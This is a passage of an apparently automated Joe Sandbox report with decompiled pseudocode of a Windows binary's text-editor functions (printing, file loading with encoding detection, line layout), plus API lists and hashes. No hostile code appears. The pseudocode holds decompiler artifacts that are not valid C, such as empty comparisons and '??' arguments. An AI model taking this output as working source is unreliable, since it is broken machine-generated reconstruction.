				intOrPtr _v224;
				struct tagOFNA _v228;
				struct tagLOGFONTW _v320;
				char _v1320;
				signed int _t102;
				signed int _t112;
				int _t117;
				int _t120;
				int _t124;
				int _t127;
				int _t132;
				void* _t134;
				void* _t135;
				signed int _t141;
				signed int _t153;
				void* _t156;
				signed int _t162;
				signed int _t166;
				int _t173;
				int _t176;
				int _t185;
				void* _t187;
				void* _t188;

				E010A66E0( &_v84, 0, 0x42);
				_v80 =  *0x10c3f24;
				_v76 =  *0x10c510c;
				_v72 =  *0x10c5110;
				_v50 =  *0x10c3f20;
				_t188 = _t187 + 0xc;
				_v60 = 0;
				_v52 = 0;
				_v84 = 0x42;
				_v64 = 0x104;
				_v56 = 0xffff0001;
				_t102 = PrintDlgW( &_v84);
				if(_t102 == 0) {
					L19:
					return _t102;
				} else {
					 *0x10c510c = _v76;
					 *0x10c5110 = _v72;
					SetMapMode(_v68, 1);
					_v124.cbSize = 0x14;
					_v124.lpszDocName = 0x10c45b8;
					_v124.lpszOutput = 0;
					_v124.lpszDatatype = 0;
					_v124.fwType = 0;
					if((_v64 & 0x00000020) == 0) {
						L3:
						_t33 = GetWindowTextLengthW( *0x10c3f2c) + 1; // 0x1
						_t176 = _t33;
						_t156 = HeapAlloc(GetProcessHeap(), 0, _t176 + _t176);
						_v16 = _t156;
						if(_t156 != 0) {
							_v8 = GetWindowTextW( *0x10c3f2c, _t156, _t176);
							_t112 = StartDocW(_v68,  &_v124);
							__eflags = _t112;
							if(_t112 <= 0) {
								L18:
								DeleteDC(_v68);
								return HeapFree(GetProcessHeap(), 0, _t156);
							}
							_t117 = MulDiv( *0x10c4c90, GetDeviceCaps(_v68, 0x5a), 0x9ec);
							_v136 = _t117 - GetDeviceCaps(_v68, 0x71);
							_t120 = MulDiv( *0x10c4c94, GetDeviceCaps(_v68, 0x5a), 0x9ec);
							_v128 = GetDeviceCaps(_v68, 0x6f) - _t120;
							_t124 = MulDiv( *0x10c4c98, GetDeviceCaps(_v68, 0x58), 0x9ec);
							_v140 = _t124 - GetDeviceCaps(_v68, 0x70);
							_t127 = MulDiv( *0x10c4c9c, GetDeviceCaps(_v68, 0x58), 0x9ec);
							_v132 = GetDeviceCaps(_v68, 0x6e) - _t127;
							memcpy( &_v320, 0x10c3f40, 0x17 << 2);
							_t132 = MulDiv(_v320.lfHeight, GetDeviceCaps(_v68, 0x5a), _v12);
							_v320.lfWeight = _v320.lfWeight - 0x64;
							_v320 = _t132;
							_t134 = CreateFontIndirectW( &_v320);
							_v12 = _t134;
							_t135 = SelectObject(_v68, _t134);
							_t156 = _v16;
							_t173 = 1;
							_v88 = _t135;
							__eflags = 1 - _v52;
							if(1 > _v52) {
								L17:
								EndDoc(_v68);
								SelectObject(_v68, _v88);
								DeleteObject(_v12);
								goto L18;
							}
							_t166 = 0;
							__eflags = 0;
							_t141 = _t156 + _v8 * 2;
							_v8 = _t141;
							do {
								_v100 = _t141;
								_t185 = 1;
								_v104 = _t156;
								_v96 =  &_v1320;
								_v92 = 0;
								do {
									__eflags = _v64 & 0x00000002;
									if(__eflags == 0) {
										_t162 = 1;
										L13:
										_t166 = E010A1980(_v68,  &_v140, __eflags, _t162, _t185,  &_v104);
										_t185 = _t185 + 1;
										__eflags = _t166;
										if(_t166 == 0) {
											goto L17;
										}
										goto L14;
									}
									__eflags = _t185 - (_v58 & 0x0000ffff);
									if(_t185 > (_v58 & 0x0000ffff)) {
										break;
									}
									__eflags = _t185 - (_v60 & 0x0000ffff);
									_t162 = 0 | __eflags >= 0x00000000;
									goto L13;
									L14:
									__eflags = _v104 - _v100;
								} while (_v104 < _v100);
								__eflags = _t166;
								if(_t166 == 0) {
									goto L17;
								}
								_t173 = _t173 + 1;
								__eflags = _t173 - (_v52 & 0x0000ffff);
								_t141 = _v8;
							} while (_t173 <= (_v52 & 0x0000ffff));
							goto L17;
						}
						return DeleteDC(_v68);
					} else {
						E010A66E0( &_v228, 0, 0x58);
						_t188 = _t188 + 0xc;
						_v224 = _v80;
						_v228 = 0x58;
						_v176 = 0x806;
						_v200 = L"output.prn";
						_v196 = 0x104;
						_v168 = L"prn";
						_t153 = GetSaveFileNameW( &_v228);
						asm("sbb eax, eax");
						_t102 =  ~_t153 & L"output.prn";
						_v124.lpszOutput = _t102;
						if(_t102 == 0) {
							goto L19;
						} else {
							goto L3;
						}
					}
				}
			}






















































                                                  0x010a1cc1
                                                  0x010a1ccb
                                                  0x010a1cd3
                                                  0x010a1cdb
                                                  0x010a1ce3
                                                  0x010a1ce8
                                                  0x010a1ceb
                                                  0x010a1cee
                                                  0x010a1cf6
                                                  0x010a1cfd
                                                  0x010a1d04
                                                  0x010a1d0b
                                                  0x010a1d13
                                                  0x010a1ff0
                                                  0x010a1ff0
                                                  0x010a1d19
                                                  0x010a1d21
                                                  0x010a1d29
                                                  0x010a1d2e
                                                  0x010a1d38
                                                  0x010a1d3f
                                                  0x010a1d46
                                                  0x010a1d4d
                                                  0x010a1d54
                                                  0x010a1d5b
                                                  0x010a1dca
                                                  0x010a1dd8
                                                  0x010a1dd8
                                                  0x010a1dee
                                                  0x010a1df0
                                                  0x010a1df5
                                                  0x010a1e14
                                                  0x010a1e1e
                                                  0x010a1e24
                                                  0x010a1e26
                                                  0x010a1fd2
                                                  0x010a1fd5
                                                  0x00000000
                                                  0x010a1fec
                                                  0x010a1e4c
                                                  0x010a1e63
                                                  0x010a1e72
                                                  0x010a1e89
                                                  0x010a1e95
                                                  0x010a1eac
                                                  0x010a1ebb
                                                  0x010a1ee0
                                                  0x010a1ee3
                                                  0x010a1ef2
                                                  0x010a1ef4
                                                  0x010a1efb
                                                  0x010a1f08
                                                  0x010a1f12
                                                  0x010a1f15
                                                  0x010a1f1b
                                                  0x010a1f1e
                                                  0x010a1f23
                                                  0x010a1f28
                                                  0x010a1f2c
                                                  0x010a1fb3
                                                  0x010a1fb6
                                                  0x010a1fc2
                                                  0x010a1fcb
                                                  0x00000000
                                                  0x010a1fd1
                                                  0x010a1f35
                                                  0x010a1f35
                                                  0x010a1f37
                                                  0x010a1f3a
                                                  0x010a1f40
                                                  0x010a1f40
                                                  0x010a1f49
                                                  0x010a1f4e
                                                  0x010a1f51
                                                  0x010a1f54
                                                  0x010a1f60
                                                  0x010a1f60
                                                  0x010a1f64
                                                  0x010a1f7b
                                                  0x010a1f80
                                                  0x010a1f94
                                                  0x010a1f96
                                                  0x010a1f97
                                                  0x010a1f99
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1f99
                                                  0x010a1f6a
                                                  0x010a1f6c
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1f74
                                                  0x010a1f76
                                                  0x00000000
                                                  0x010a1f9b
                                                  0x010a1f9e
                                                  0x010a1f9e
                                                  0x010a1fa3
                                                  0x010a1fa5
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1fab
                                                  0x010a1fac
                                                  0x010a1fae
                                                  0x010a1fae
                                                  0x00000000
                                                  0x010a1f40
                                                  0x010a1e05
                                                  0x010a1d5d
                                                  0x010a1d68
                                                  0x010a1d70
                                                  0x010a1d73
                                                  0x010a1d80
                                                  0x010a1d8a
                                                  0x010a1d94
                                                  0x010a1d9e
                                                  0x010a1da8
                                                  0x010a1db2
                                                  0x010a1dba
                                                  0x010a1dbc
                                                  0x010a1dc1
                                                  0x010a1dc4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a1dc4
                                                  0x010a1d5b

                                                  APIs
                                                  • _memset.LIBCMT ref: 010A1CC1
                                                  • PrintDlgW.COMDLG32(?), ref: 010A1D0B
                                                  • SetMapMode.GDI32(?,00000001), ref: 010A1D2E
                                                  • _memset.LIBCMT ref: 010A1D68
                                                  • GetSaveFileNameW.COMDLG32(?), ref: 010A1DB2
                                                  • GetWindowTextLengthW.USER32 ref: 010A1DD2
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A1DE1
                                                  • HeapAlloc.KERNEL32(00000000), ref: 010A1DE8
                                                  • DeleteDC.GDI32(?), ref: 010A1DFA
                                                  • GetWindowTextW.USER32 ref: 010A1E0E
                                                  • StartDocW.GDI32(?,00000014), ref: 010A1E1E
                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 010A1E3D
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1E4C
                                                  • GetDeviceCaps.GDI32(?,00000071), ref: 010A1E55
                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 010A1E69
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1E72
                                                  • GetDeviceCaps.GDI32(?,0000006F), ref: 010A1E7B
                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 010A1E8C
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1E95
                                                  • GetDeviceCaps.GDI32(?,00000070), ref: 010A1E9E
                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 010A1EB2
                                                  • MulDiv.KERNEL32(00000000), ref: 010A1EBB
                                                  • GetDeviceCaps.GDI32(?,0000006E), ref: 010A1EC4
                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 010A1EE5
                                                  • MulDiv.KERNEL32(?,00000000), ref: 010A1EF2
                                                  • CreateFontIndirectW.GDI32(?), ref: 010A1F08
                                                  • SelectObject.GDI32(?,00000000), ref: 010A1F15
                                                  • EndDoc.GDI32(?), ref: 010A1FB6
                                                  • SelectObject.GDI32(?,?), ref: 010A1FC2
                                                  • DeleteObject.GDI32(?), ref: 010A1FCB
                                                  • DeleteDC.GDI32(?), ref: 010A1FD5
                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010A1FDE
                                                  • HeapFree.KERNEL32(00000000), ref: 010A1FE5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Heap$DeleteObject$ProcessSelectTextWindow_memset$AllocCreateFileFontFreeIndirectLengthModeNamePrintSaveStart
                                                  • String ID: $B$X$d$prn
                                                  • API String ID: 1012857974-182643923
                                                  • Opcode ID: 76a1c6afb9bd5251449a4714e256d19bcde66cf97625c41d9c3722fe9463210a
                                                  • Instruction ID: 421f3cfadb9668999931931a061ff8df3cb428f61af2f64e0476b321be325b46
                                                  • Opcode Fuzzy Hash: 76a1c6afb9bd5251449a4714e256d19bcde66cf97625c41d9c3722fe9463210a
                                                  • Instruction Fuzzy Hash: E0A10571D00258EFEB209FE4DD88BDEBBB9FB48304F004065EA85AB294DB7A5945CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1140 Relevance: 54.5, APIs: 30, Strings: 1, Instructions: 261memorywindowfileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E010A1140(WCHAR* __ecx, int __edx) {
				long _v8;
				long _v12;
				int _v16;
				short _v28;
				int _t26;
				long _t27;
				int _t33;
				void* _t36;
				signed int _t37;
				int _t56;
				long _t60;
				void _t66;
				int _t68;
				int _t73;
				void* _t74;
				int _t77;
				short _t78;
				WCHAR* _t84;
				void* _t85;
				int _t87;
				int _t88;
				void* _t89;
				void* _t92;
				void* _t93;

				_t73 = __edx;
				_t84 = __ecx;
				_t88 = GetWindowTextLengthW( *0x10c3f2c);
				if(SendMessageW( *0x10c3f2c, 0xb8, 0, 0) == 0) {
					L9:
					_t26 = CreateFileW(_t84, 0x80000000, 3, 0, 3, 0x80, 0);
					_t85 = _t26;
					if(_t85 == 0xffffffff) {
						goto L43;
					} else {
						_t27 = GetFileSize(_t85, 0);
						_v8 = _t27;
						if(_t27 != 0xffffffff) {
							_t89 = HeapAlloc(GetProcessHeap(), 0, _t27 + 2);
							if(_t89 == 0) {
								goto L11;
							} else {
								_t33 = ReadFile(_t85, _t89, _v8,  &_v12, 0);
								_push(_t85);
								if(_t33 != 0) {
									CloseHandle();
									_t77 = _v12;
									_v8 = _t77;
									if(_t73 != 0xffffffff) {
										if(_t77 >= 2 && (_t73 == 1 || _t73 == 2)) {
											_t66 =  *_t89;
											if(_t66 != 0xff ||  *((char*)(_t89 + 1)) != 0xfe) {
												if(_t66 == 0xfe) {
													_t73 =  ==  ? 2 : _t73;
												}
											} else {
												_t73 = 1;
											}
										}
									} else {
										_t68 = E010A10E0(_t89, _t77);
										_t77 = _v8;
										_t73 = _t68;
									}
									_t36 = _t73 - 1;
									if(_t36 == 0 || _t36 == 1) {
										_t74 = _t89;
										_t87 = _t77 >> 1;
										goto L31;
									} else {
										_t56 =  ==  ? 0xfde9 : 0;
										_v16 = _t56;
										_t87 = MultiByteToWideChar(_t56, 0, _t89, _t77, 0, 0);
										_t60 = HeapAlloc(GetProcessHeap(), 0, 2 + _t87 * 2);
										_t74 = _t60;
										if(_t74 != 0) {
											MultiByteToWideChar(_v16, 0, _t89, _v8, _t74, _t87);
											HeapFree(GetProcessHeap(), 0, _t89);
											L31:
											_t37 = 0;
											if(_t87 > 0) {
												_t14 = _t37 + 0x20; // 0x20
												_t78 = _t14;
												do {
													if( *((short*)(_t74 + _t37 * 2)) == 0) {
														 *((short*)(_t74 + _t37 * 2)) = _t78;
													}
													_t37 = _t37 + 1;
												} while (_t37 < _t87);
											}
											 *((short*)(_t74 + _t87 * 2)) = 0;
											if(_t87 < 1 ||  *_t74 != 0xfeff) {
												_push(_t74);
											} else {
												_t21 = _t74 + 2; // 0x2
											}
											SetWindowTextW( *0x10c3f2c, ??);
											HeapFree(GetProcessHeap(), 0, _t74);
											SendMessageW( *0x10c3f2c, 0xb9, 0, 0);
											SendMessageW( *0x10c3f2c, 0xcd, 0, 0);
											SetFocus( *0x10c3f2c);
											_t26 = GetWindowTextW( *0x10c3f2c,  &_v28, 0);
											if(_t26 != 0) {
												_t26 = lstrcmpW( &_v28, L".LOG");
												if(_t26 == 0) {
													SendMessageW( *0x10c3f2c, 0xb1, GetWindowTextLengthW( *0x10c3f2c), 0xffffffff);
													SendMessageW( *0x10c3f2c, 0xc2, 1, L"\r\n");
													E010A2150();
													return SendMessageW( *0x10c3f2c, 0xc2, 1, L"\r\n");
												}
											}
											goto L43;
										} else {
											return HeapFree(GetProcessHeap(), _t60, _t89);
										}
									}
								} else {
									CloseHandle();
									return HeapFree(GetProcessHeap(), 0, _t89);
								}
							}
						} else {
							L11:
							return CloseHandle(_t85);
						}
					}
				} else {
					_t26 =  *0x10c43b0;
					if(_t88 != 0 || _t26 != 0) {
						_t92 = _t88 - 2;
						if(_t92 == 0) {
							L43:
							return _t26;
						} else {
							_t93 = _t92 - 4;
							if(_t93 == 0) {
								if(_t26 != 0) {
									goto L9;
								} else {
									_t26 = E010A1770();
									if(_t26 == 0) {
										goto L43;
									} else {
										goto L9;
									}
								}
							} else {
								if(_t93 == 1) {
									goto L9;
								} else {
									return _t26;
								}
							}
						}
					} else {
						goto L9;
					}
				}
			}



























                                                  0x010a114f
                                                  0x010a1151
                                                  0x010a1168
                                                  0x010a1172
                                                  0x010a11ad
                                                  0x010a11c0
                                                  0x010a11c6
                                                  0x010a11cb
                                                  0x00000000
                                                  0x010a11d1
                                                  0x010a11d4
                                                  0x010a11da
                                                  0x010a11e0
                                                  0x010a1203
                                                  0x010a1207
                                                  0x00000000
                                                  0x010a1209
                                                  0x010a1214
                                                  0x010a121a
                                                  0x010a121d
                                                  0x010a123d
                                                  0x010a1243
                                                  0x010a1246
                                                  0x010a124c
                                                  0x010a1261
                                                  0x010a126d
                                                  0x010a1271
                                                  0x010a1282
                                                  0x010a128d
                                                  0x010a128d
                                                  0x010a1279
                                                  0x010a1279
                                                  0x010a1279
                                                  0x010a1271
                                                  0x010a124e
                                                  0x010a1252
                                                  0x010a1257
                                                  0x010a125a
                                                  0x010a125a
                                                  0x010a1292
                                                  0x010a1293
                                                  0x010a1314
                                                  0x010a131c
                                                  0x00000000
                                                  0x010a1298
                                                  0x010a12a8
                                                  0x010a12ae
                                                  0x010a12b7
                                                  0x010a12cb
                                                  0x010a12d1
                                                  0x010a12d5
                                                  0x010a12f8
                                                  0x010a130a
                                                  0x010a131e
                                                  0x010a131e
                                                  0x010a1322
                                                  0x010a1324
                                                  0x010a1324
                                                  0x010a1327
                                                  0x010a132c
                                                  0x010a132e
                                                  0x010a132e
                                                  0x010a1332
                                                  0x010a1333
                                                  0x010a1327
                                                  0x010a1339
                                                  0x010a1340
                                                  0x010a1352
                                                  0x010a134c
                                                  0x010a134c
                                                  0x010a134f
                                                  0x010a1359
                                                  0x010a1365
                                                  0x010a1380
                                                  0x010a1391
                                                  0x010a1399
                                                  0x010a13ab
                                                  0x010a13b3
                                                  0x010a13be
                                                  0x010a13c6
                                                  0x010a13e2
                                                  0x010a13f6
                                                  0x010a13f8
                                                  0x00000000
                                                  0x010a140f
                                                  0x010a13c6
                                                  0x00000000
                                                  0x010a12d7
                                                  0x010a12ec
                                                  0x010a12ec
                                                  0x010a12d5
                                                  0x010a121f
                                                  0x010a121f
                                                  0x010a123c
                                                  0x010a123c
                                                  0x010a121d
                                                  0x010a11e2
                                                  0x010a11e2
                                                  0x010a11ef
                                                  0x010a11ef
                                                  0x010a11e0
                                                  0x010a1174
                                                  0x010a1174
                                                  0x010a117c
                                                  0x010a1183
                                                  0x010a1186
                                                  0x010a1417
                                                  0x010a1417
                                                  0x010a118c
                                                  0x010a118c
                                                  0x010a118f
                                                  0x010a119e
                                                  0x00000000
                                                  0x010a11a0
                                                  0x010a11a0
                                                  0x010a11a7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a11a7
                                                  0x010a1191
                                                  0x010a1192
                                                  0x00000000
                                                  0x010a119a
                                                  0x010a119a
                                                  0x010a119a
                                                  0x010a1192
                                                  0x010a118f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010a117c

                                                  APIs
                                                  • GetWindowTextLengthW.USER32 ref: 010A1153
                                                  • SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A116A
                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11C0
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11D4
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11E3
                                                  • GetProcessHeap.KERNEL32(00000000,-00000002,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11F6
                                                  • HeapAlloc.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A11FD
                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1214
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A121F
                                                  • HeapFree.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1230
                                                  • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A123D
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12B1
                                                  • HeapAlloc.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12CB
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12D9
                                                  • HeapFree.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12E0
                                                    • Part of subcall function 010A1770: _memset.LIBCMT ref: 010A1781
                                                    • Part of subcall function 010A1770: lstrcpyW.KERNEL32 ref: 010A1795
                                                    • Part of subcall function 010A1770: GetSaveFileNameW.COMDLG32(?), ref: 010A17FD
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A12F8
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1307
                                                  • HeapFree.KERNEL32(00000000,?,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A130A
                                                  • SetWindowTextW.USER32(00000000), ref: 010A1359
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1362
                                                  • HeapFree.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1365
                                                  • SendMessageW.USER32(000000B9,00000000,00000000), ref: 010A1380
                                                  • SendMessageW.USER32(000000CD,00000000,00000000), ref: 010A1391
                                                  • SetFocus.USER32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A1399
                                                  • GetWindowTextW.USER32 ref: 010A13AB
                                                  • lstrcmpW.KERNEL32(?,.LOG,?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 010A13BE
                                                  • GetWindowTextLengthW.USER32(000000FF), ref: 010A13D0
                                                  • SendMessageW.USER32(000000B1,00000000,?,80000000), ref: 010A13E2
                                                  • SendMessageW.USER32(000000C2,00000001,010BEE24), ref: 010A13F6
                                                  • SendMessageW.USER32(000000C2,00000001,010BEE24), ref: 010A140F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Heap$MessageSend$FileFreeProcessTextWindow$CloseHandle$AllocByteCharLengthMultiWide$CreateFocusNameReadSaveSize_memsetlstrcmplstrcpy
                                                  • String ID: .LOG
                                                  • API String ID: 597183282-2272326732
                                                  • Opcode ID: 9e0341d5d14a1de73616a7d6ef55f6286cb74d53c09b4e71e600cb12abdac55c
                                                  • Instruction ID: f1d4bd0fd3d428322d88ab0b2ab9a28689df52f255d06a9da6523ac5bdf679e1
                                                  • Opcode Fuzzy Hash: 9e0341d5d14a1de73616a7d6ef55f6286cb74d53c09b4e71e600cb12abdac55c
                                                  • Instruction Fuzzy Hash: 2F81E832640205BBFB315BF8ADC9FEA3B79EB45750F508961FAC5EA1C4CB7688018B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1980 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 294memorystringwindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E010A1980(struct HDC__* __ecx, int* __edx, void* __eflags, intOrPtr _a4, WCHAR* _a8, int _a12) {
				struct HDC__* _v8;
				struct tagSIZE _v16;
				int* _v20;
				struct tagSIZE _v28;
				struct tagTEXTMETRICW _v88;
				signed int _t93;
				int _t96;
				int _t104;
				int _t106;
				WCHAR* _t120;
				int _t121;
				signed int _t128;
				int _t131;
				int _t142;
				struct HDC__* _t153;
				signed int _t154;
				int _t156;
				struct HDC__* _t157;
				short _t162;
				signed int _t163;
				WCHAR* _t164;
				WCHAR* _t168;
				int _t169;
				int _t170;
				void* _t171;
				RECT* _t172;
				intOrPtr _t174;
				int _t175;
				void* _t178;
				int* _t179;
				void* _t180;
				void* _t184;

				_t172 = __edx;
				_t168 = _a8;
				_t153 = __ecx;
				_v20 = __edx;
				_v8 = __ecx;
				_t178 = E010A1890(0x10c4ea8, _t168);
				_a8 = _t178;
				if(_t178 == 0) {
					L4:
					return 0;
				} else {
					if(_a4 == 0 || StartPage(__ecx) > 0) {
						GetTextMetricsW(_t153,  &_v88);
						_t92 = lstrlenW;
						if( *0x10c43b0 == 0) {
							_t154 = 0;
						} else {
							GetTextExtentPoint32W(_t153, 0x10c43b0, lstrlenW(0x10c43b0),  &_v16);
							if(_a4 != 0) {
								_t142 = lstrlenW(0x10c43b0);
								asm("cdq");
								ExtTextOutW(_t153, _t172->right - _v16.cx + _t172->left - _t168 >> 1, _t172->top, 4, _t172, 0x10c43b0, _t142, 0);
								_t178 = _a8;
							}
							_t92 = lstrlenW;
							_t154 = 1;
						}
						_t156 = _t154 * _v88.tmHeight + _t172->top;
						if( *_t178 == 0) {
							_t93 = 0;
						} else {
							GetTextExtentPoint32W(_v8, _t178,  *_t92( &_v16), _t178);
							_t93 = 1;
						}
						_t179 = _a12;
						_t174 = _t172->bottom - _t93 * _v88.tmHeight + _t93 * _v88.tmHeight;
						_v16.cy = _t174;
						do {
							_t169 = _t179[3];
							if(_t169 != 0 ||  *_t179 >= _t179[1]) {
								L30:
								if( *0x10c3f9c == 0) {
									_t170 = _t179[3];
									goto L40;
								} else {
									goto L31;
								}
							} else {
								while(1) {
									L16:
									_t162 =  *( *_t179) & 0x0000ffff;
									if(_t162 == 0xa || _t162 == 0xd) {
										goto L30;
									}
									if(_t162 != 9) {
										if(_t169 >= 0x1f4) {
											goto L28;
										} else {
											_t179[3] = _t179[3] + 1;
											_t179[2][_t169] = _t162;
											goto L27;
										}
									} else {
										_t171 = 0;
										do {
											_t163 = _t179[3];
											if(_t163 >= 0x1f4) {
												if( *0x10c3f9c == 0) {
													goto L23;
												}
											} else {
												_t179[2][_t163] = 0x20;
												_t174 = _v16.cy;
												_t179[3] = _t163 + 1;
												goto L23;
											}
											L27:
											_t169 = _t179[3];
											if(_t169 < 0x1f4) {
												L29:
												 *_t179 =  *_t179 + 2;
												if( *_t179 < _t179[1]) {
													goto L16;
												} else {
													goto L30;
												}
											} else {
												L28:
												if( *0x10c3f9c != 0) {
													L31:
													GetTextExtentExPointW(_v8, _t179[2], _t179[3], _v20[2] -  *_v20,  &_a12, 0,  &_v28);
													_t170 = _a12;
													if(_t170 < _t179[3]) {
														_t120 = _t179[2];
														_t164 =  &(_t120[_t170]);
														if(_t120[_t170] != 0x20) {
															_t121 = _t170;
															if(_t170 != 0) {
																while( *_t164 != 0x20) {
																	_t164 = _t164 - 2;
																	_t121 = _t121 - 1;
																	if(_t121 != 0) {
																		continue;
																	}
																	goto L37;
																}
															}
															L37:
															if(_t121 > 0) {
																_t170 = _t121 + 1;
																L40:
																_a12 = _t170;
															}
														}
													}
												} else {
													goto L29;
												}
											}
											goto L41;
											L23:
											_t171 = _t171 + 1;
										} while (_t171 < 8);
										goto L27;
									}
									goto L41;
								}
								goto L30;
							}
							L41:
							if(_a4 != 0) {
								ExtTextOutW(_v8,  *_v20, _t156, 4, _v20, _t179[2], _t170, 0);
								_t170 = _a12;
							}
							_t59 =  &(_t179[3]);
							 *_t59 = _t179[3] - _t170;
							_t96 = _t179[3];
							if( *_t59 == 0) {
								_t175 = _t179[1];
								if( *_t179 < _t175) {
									while(_t156 < _v16.cy) {
										_t170 =  *_t179;
										_t128 =  *_t170 & 0x0000ffff;
										if(_t128 == 0xa) {
											L50:
											_t156 = _t156 + _v88.tmExternalLeading + _v88.tmHeight;
											goto L51;
										} else {
											if(_t128 == 0xd) {
												if(_t128 == 0xa) {
													goto L50;
												}
												L51:
												_t131 = _t170 + 2;
												 *_t179 = _t131;
												if(_t131 < _t175) {
													continue;
												}
											}
										}
										goto L52;
									}
								}
								L52:
								_t174 = _v16.cy;
							} else {
								E010A81F0(_t179[2],  &(_t179[2][_t170]), _t96 + _t96);
								_t184 = _t184 + 0xc;
								_t156 = _t156 + _v88.tmExternalLeading + _v88.tmHeight;
							}
						} while ( *_t179 < _t179[1] && _t156 < _t174);
						_t180 = _a8;
						if( *_t180 == 0) {
							_t157 = _v8;
							goto L59;
						} else {
							_t104 = lstrlenW(_t180);
							_t157 = _v8;
							GetTextExtentPoint32W(_t157, _t180, _t104,  &_v16);
							if(_a4 != 0) {
								_t176 = _v20;
								_t106 = lstrlenW(_a8);
								asm("cdq");
								ExtTextOutW(_t157, _v20[2] - _v16.cx +  *_v20 - _t170 >> 1, _v20->bottom - _v16.cy, 4, _t176, _a8, _t106, 0);
								_t180 = _a8;
								L59:
								if(_a4 != 0) {
									EndPage(_t157);
								}
							}
						}
						HeapFree(GetProcessHeap(), 0, _t180);
						return 1;
					} else {
						MessageBoxW( *0x10c3f24, L"StartPage failed", L"Print Error", 0x30);
						HeapFree(GetProcessHeap(), 0, _t178);
						goto L4;
					}
				}
			}



































                                                  0x010a1989
                                                  0x010a198b
                                                  0x010a198e
                                                  0x010a1995
                                                  0x010a1998
                                                  0x010a19a0
                                                  0x010a19a2
                                                  0x010a19a7
                                                  0x010a19e4
                                                  0x010a19ea
                                                  0x010a19a9
                                                  0x010a19ad
                                                  0x010a19f2
                                                  0x010a1a00
                                                  0x010a1a05
                                                  0x010a1a64
                                                  0x010a1a07
                                                  0x010a1a19
